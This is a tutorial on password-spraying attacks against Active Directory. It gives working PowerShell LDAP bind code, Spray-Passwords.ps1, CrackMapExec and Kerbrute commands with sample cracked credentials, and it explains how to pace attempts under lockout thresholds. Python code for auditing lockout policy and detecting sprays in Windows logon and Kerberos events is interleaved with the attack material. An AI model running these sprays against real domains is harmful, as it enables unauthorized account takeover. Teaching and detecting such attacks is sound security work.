
Password Attacks

January 05, 2026 8 min read

In earlier modules, we explored password attacks against network services and hashed credentials. Now, we move into a far more common and realistic enterprise target: Active Directory (AD). From a red team perspective, AD password attacks are not about speed or brute force. They are about patience, stealth, and understanding domain policies.

This section focuses on password spraying attacks—a technique widely used by attackers to identify weak passwords across many domain users without triggering security controls.

Understanding Account Lockout Policies

Before launching any authentication-based attack in Active Directory, one concept must be clearly understood: account lockout policy.

Unlike offline attacks, online authentication attempts are monitored. Too many failed logins can:

  • Lock the target account
  • Prevent further testing
  • Trigger alerts to administrators and security monitoring systems

Viewing Domain Account Policies

To understand these limits, we can inspect the account policy with the built-in net accounts command from a PowerShell (or cmd) prompt. Without arguments it reports the policy in effect on the local machine; net accounts /domain queries the domain controller for the domain policy:

PS C:\Users\john> net accounts

Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 42
Minimum password length: 7
Length of password history maintained: 24
Lockout threshold: 5
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: WORKSTATION
The command completed successfully.

Interpreting the Results

Key values from an attacker’s perspective:

  • Lockout threshold: 5
    The account locks after 5 failed attempts. To avoid locking any account, we should attempt no more than 4 failures per user within one observation window.
  • Lockout observation window: 30 minutes
    The failure counter resets 30 minutes after the last failed attempt.

When used carefully, this allows us to perform password spraying over time. By spacing attempts correctly, an attacker could generate a high number of authentication attempts per day without locking accounts.
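The policy values above are worth auditing rather than just reading. The following Python is an added example (not code from the original page): it parses the text that net accounts prints, compares it with a hardening baseline whose numbers are assumptions to adjust to your own standard, and reports how many failed logons per user per day the policy tolerates before any lockout, which is exactly the room a low-and-slow spray works within. The sample output is the page's own, embedded as a constructed string.

```python
"""Audit a Windows account lockout policy from `net accounts` output."""

# Constructed sample: the output shown on the page, minus the prompt.
SAMPLE_OUTPUT = """\
Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 42
Minimum password length: 7
Length of password history maintained: 24
Lockout threshold: 5
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: WORKSTATION
The command completed successfully.
"""

# Baseline used by audit(); assumed values, not the page's or a vendor's.
BASELINE = {
    "lockout_threshold_max": 10,     # 0 means lockout is disabled entirely
    "observation_window_min": 15,
    "lockout_duration_min": 15,
    "min_password_length": 14,
}

# Labels net accounts prints, mapped to the keys used below.
FIELDS = {
    "Lockout threshold": "lockout_threshold",
    "Lockout duration (minutes)": "lockout_duration",
    "Lockout observation window (minutes)": "observation_window",
    "Minimum password length": "min_password_length",
}


def parse_net_accounts(text):
    """Return a dict of the numeric policy values found in the output."""
    policy = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        label, _, value = line.partition(":")
        key = FIELDS.get(label.strip())
        if key is None:
            continue
        value = value.strip()
        if value.lower() == "never":      # printed when lockout is disabled
            policy[key] = 0
        elif value.isdigit():
            policy[key] = int(value)
    return policy


def tolerated_failures_per_day(policy):
    """Failed logons per user per day that never trigger a lockout.

    The counter resets `observation_window` minutes after the last failure,
    so (threshold - 1) failures per window never lock the account.
    Returns None when lockout is disabled, i.e. there is no limit at all.
    """
    threshold = policy["lockout_threshold"]
    if threshold == 0:
        return None
    windows_per_day = (24 * 60) // policy["observation_window"]
    return (threshold - 1) * windows_per_day


def audit(policy, baseline=BASELINE):
    """Return a list of findings where the policy is weaker than the baseline."""
    findings = []
    threshold = policy["lockout_threshold"]
    if threshold == 0:
        findings.append("lockout disabled: unlimited online guessing per account")
    elif threshold > baseline["lockout_threshold_max"]:
        findings.append(f"lockout threshold {threshold} above baseline "
                        f"{baseline['lockout_threshold_max']}")
    if policy["observation_window"] < baseline["observation_window_min"]:
        findings.append(f"observation window {policy['observation_window']} min "
                        f"shorter than baseline {baseline['observation_window_min']}")
    if policy["lockout_duration"] < baseline["lockout_duration_min"]:
        findings.append(f"lockout duration {policy['lockout_duration']} min "
                        f"shorter than baseline {baseline['lockout_duration_min']}")
    if policy["min_password_length"] < baseline["min_password_length"]:
        findings.append(f"minimum password length {policy['min_password_length']} "
                        f"below baseline {baseline['min_password_length']}")
    return findings


if __name__ == "__main__":
    policy = parse_net_accounts(SAMPLE_OUTPUT)
    print(policy)
    print("tolerated failures per user per day:", tolerated_failures_per_day(policy))
    for finding in audit(policy):
        print("finding:", finding)
```

On the page's policy the only baseline finding is the 7-character minimum length, yet the policy still tolerates 4 failures per user every 30 minutes, so a single weak password policy is what turns that tolerance into a real risk.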

What Is Password Spraying?

Instead of testing many passwords against a single user (brute force), password spraying works the other way around:

  • Use one common password
  • Test it against many users
  • Move slowly to avoid lockouts

This approach is effective because:

  • Users often reuse weak or predictable passwords
  • Lockout policies are per-user, not per-password
  • Network defenders often miss low-and-slow attacks
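Per-account lockout and per-account alerting both miss a spray because no single account fails often; what gives it away is one source touching many accounts inside a short window. The following Python is an added example, not code from the original page: it runs that check over a constructed set of records shaped like the fields a SIEM extracts from Windows Security event 4625 (An account failed to log on) on the host that received the attempts. The field names and the sample hosts and users are assumptions for the demo.

```python
"""Flag the low-and-slow password-spray pattern in 4625 failed-logon events."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# 4625 SubStatus values that mean the credential itself was rejected.
WRONG_PASSWORD = "0xC000006A"
NO_SUCH_USER = "0xC0000064"
LOCKED_OUT = "0xC0000234"
CREDENTIAL_FAILURES = {WRONG_PASSWORD, NO_SUCH_USER, LOCKED_OUT}


def _event(time, user, ip, sub_status=WRONG_PASSWORD):
    # Assumed field names; map your SIEM's TargetUserName/IpAddress/SubStatus here.
    return {"time": time, "user": user, "ip": ip, "sub_status": sub_status}


# Constructed sample: one host tries a single password against ten accounts,
# twice each, within ten minutes; a user on another host mistypes her own
# password three times. Only the first pattern is a spray.
SAMPLE_EVENTS = []
for i, user in enumerate(["pete", "jen", "dave", "sara", "mike",
                          "amy", "tom", "lisa", "raj", "ana"]):
    for attempt in range(2):
        SAMPLE_EVENTS.append(
            _event(f"2026-01-05T09:{i:02d}:{attempt * 20:02d}", user, "192.168.50.21"))
for m in range(3):
    SAMPLE_EVENTS.append(_event(f"2026-01-05T09:1{m}:05", "carol", "192.168.50.88"))


def _ts(event):
    return datetime.fromisoformat(event["time"])


def detect_spray(events, window=timedelta(minutes=30), min_users=5,
                 lockout_threshold=5):
    """Return one alert per source whose failures, inside some `window`,
    touched at least `min_users` distinct accounts.

    lockout_threshold is the domain's value (5 on the page). An alert whose
    busiest account stayed below it is the case that per-account lockout
    never fires on, which is why the rule keys on the source, not the user.
    """
    by_source = defaultdict(list)
    for e in events:
        if e["sub_status"] in CREDENTIAL_FAILURES:
            by_source[e["ip"]].append(e)

    alerts = []
    for ip, evs in by_source.items():
        evs.sort(key=_ts)
        best = Counter()
        start = 0
        for end in range(len(evs)):
            # Advance `start` until evs[start:end + 1] fits inside the window.
            while _ts(evs[end]) - _ts(evs[start]) > window:
                start += 1
            in_window = Counter(e["user"] for e in evs[start:end + 1])
            if len(in_window) > len(best):
                best = in_window
        if len(best) >= min_users:
            peak = max(best.values())
            alerts.append({
                "source": ip,
                "distinct_users": len(best),
                "max_attempts_per_user": peak,
                "below_lockout_threshold": peak < lockout_threshold,
                "users": sorted(best),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(SAMPLE_EVENTS):
        print(alert)
```

The window should be at least as long as the domain's observation window, since a patient spray paces itself to that value; shrinking it to a minute in the sample makes the same events look like scattered noise and produces no alert.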

Method 1: Password Spraying via LDAP (ADSI)

This method uses LDAP authentication through PowerShell and the .NET DirectoryEntry class.

How It Works

If valid credentials are supplied, the DirectoryEntry object is created and can be used. If the password is incorrect, the LDAP bind fails and PowerShell reports an error (such as "The user name or password is incorrect") as soon as it tries to display the object.

Example: Testing Credentials with LDAP

# Locate the primary domain controller of the current domain and build an
# LDAP path of the form LDAP://<PDC hostname>/DC=corp,DC=com
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName

# Bind to that path with the credentials under test; the bind succeeds
# only if the username and password are valid
New-Object System.DirectoryServices.DirectoryEntry($SearchString, "pete", "Nexus123!")

If the username and password are valid, the object is created. If not, authentication fails.

Automating the Attack

Using this technique, we can build a PowerShell script that:

  1. Enumerates all domain users
  2. Respects lockout thresholds and timing
  3. Performs controlled password spraying

An example tool is:

https://github.com/michele-dedonno/MDD-scripts/blob/master/Spray-Passwords.ps1


Example Usage

PS C:\> powershell -ep bypass
PS C:\Tools> .\Spray-Passwords.ps1 -Pass Nexus123! -Admin

Output:

WARNING: also targeting admin accounts.
Performing brute force - press [q] to stop the process and print results...
Guessed password for user: 'pete' = 'Nexus123!'
Guessed password for user: 'jen' = 'Nexus123!'

Users guessed are:
'pete' with password: 'Nexus123!'
'jen' with password: 'Nexus123!'

Key Options

  • -Pass : Test a single password against all users
  • -File : Provide a list of passwords
  • -Admin : Include administrative accounts in the attack

This approach is relatively quiet and well-suited for internal red team operations.

Method 2: Password Spraying via SMB

In this method, authentication attempts are made over SMB.

Tool: CrackMapExec

CrackMapExec is commonly used for lateral movement and credential testing. Here, it is used for password spraying.

Example Command

kali@kali:~$ crackmapexec smb 192.168.50.75 \
-u users.txt \
-p 'Nexus123!' \
-d corp.com \
--continue-on-success

Example output:

SMB 192.168.50.75 445 CLIENT75 [+] corp.com\jen:Nexus123!
SMB 192.168.50.75 445 CLIENT75 [+] corp.com\pete:Nexus123!

Important Considerations

  • Each authentication attempt requires a full SMB connection
  • This generates high network traffic
  • The attack is slow and very noisy
  • CrackMapExec does not check password policies

Because of this, attackers must carefully manage timing to avoid account lockouts.

Note: If a compromised user has administrative privileges on the target system, CrackMapExec marks it as Pwn3d! in the output.

Method 3: Password Spraying via Kerberos (TGT Requests)

This method focuses on Kerberos authentication, specifically requesting a Ticket Granting Ticket (TGT).

Why This Method Is Powerful

  • Only two UDP packets are used per attempt
  • No full session is established
  • Extremely fast and stealthy
  • Ideal for large-scale spraying

If the username and password are valid, the domain controller responds with a TGT.

Tool: Kerbrute

Kerbrute is a cross-platform tool designed for Kerberos-based attacks.

Example Command

PS C:\Tools> .\kerbrute_windows_amd64.exe passwordspray `
-d corp.com `
.\usernames.txt `
"Nexus123!"

The usernames.txt file must be saved with ANSI encoding, or Kerbrute may fail to process it correctly.
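Because a Kerberos spray never opens a session on a member host, the evidence lives in the domain controller's own Security log: each failed pre-authentication for an existing account is event 4771 with failure code 0x18 (wrong password), each TGT that was issued is event 4768 with result code 0x0, and an AS-REQ for a nonexistent account is a 4768 with result code 0x6. The following Python is an added example, not code from the original page or from the Kerbrute project: it groups those events by client address, flags a source that fails against many accounts, and lists the accounts that same source obtained TGTs for, which are the ones whose password was guessed. The tuple layout and the sample hosts and users are assumptions for the demo.

```python
"""Correlate Kerberos AS-REQ events (4768/4771) to find a spray and its hits."""
from collections import defaultdict

PREAUTH_FAILED = "0x18"     # 4771: wrong password for an existing account
TGT_ISSUED = "0x0"          # 4768: TGT issued, i.e. the password was correct
UNKNOWN_PRINCIPAL = "0x6"   # 4768: the account does not exist

# Constructed sample of (time, event id, account, client address, result or
# failure code) as a collector might flatten the DC's Security log.
SAMPLE_EVENTS = [
    ("2026-01-05T10:00:01", 4771, "dave", "192.168.50.21", "0x18"),
    ("2026-01-05T10:00:01", 4768, "pete", "192.168.50.21", "0x0"),
    ("2026-01-05T10:00:02", 4771, "sara", "192.168.50.21", "0x18"),
    ("2026-01-05T10:00:02", 4768, "jen", "192.168.50.21", "0x0"),
    ("2026-01-05T10:00:03", 4768, "ghost", "192.168.50.21", "0x6"),
    ("2026-01-05T10:00:03", 4771, "mike", "192.168.50.21", "0x18"),
    ("2026-01-05T10:00:04", 4771, "amy", "192.168.50.21", "0x18"),
    # Ordinary activity: a workstation getting its user's own TGT, then one typo.
    ("2026-01-05T10:00:05", 4768, "carol", "192.168.50.88", "0x0"),
    ("2026-01-05T10:05:00", 4771, "carol", "192.168.50.88", "0x18"),
]


def summarize_kerberos(events, min_failed_accounts=3):
    """Return one alert per client address that failed pre-authentication (or
    asked for unknown accounts) against at least `min_failed_accounts`
    distinct names. Each alert also lists the accounts the same address did
    get a TGT for: on a spraying source those are the successful guesses."""
    per_source = defaultdict(lambda: {"failed": set(), "unknown": set(), "tgt": set()})
    for _time, event_id, account, client, code in events:
        bucket = per_source[client]
        if event_id == 4771 and code == PREAUTH_FAILED:
            bucket["failed"].add(account)
        elif event_id == 4768 and code == UNKNOWN_PRINCIPAL:
            bucket["unknown"].add(account)
        elif event_id == 4768 and code == TGT_ISSUED:
            bucket["tgt"].add(account)

    alerts = []
    for client, bucket in per_source.items():
        if len(bucket["failed"]) + len(bucket["unknown"]) >= min_failed_accounts:
            alerts.append({
                "source": client,
                "accounts_failed": sorted(bucket["failed"]),
                "accounts_unknown": sorted(bucket["unknown"]),
                "accounts_compromised": sorted(bucket["tgt"]),
            })
    return alerts


if __name__ == "__main__":
    for alert in summarize_kerberos(SAMPLE_EVENTS):
        print(alert)
```

A single user's own failures never reach the threshold, while the spraying address is flagged with four failed accounts, one nonexistent name, and the two accounts (pete and jen, matching the page's results) it actually got tickets for; a 4771 on its own would have told you nothing about which guesses succeeded.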
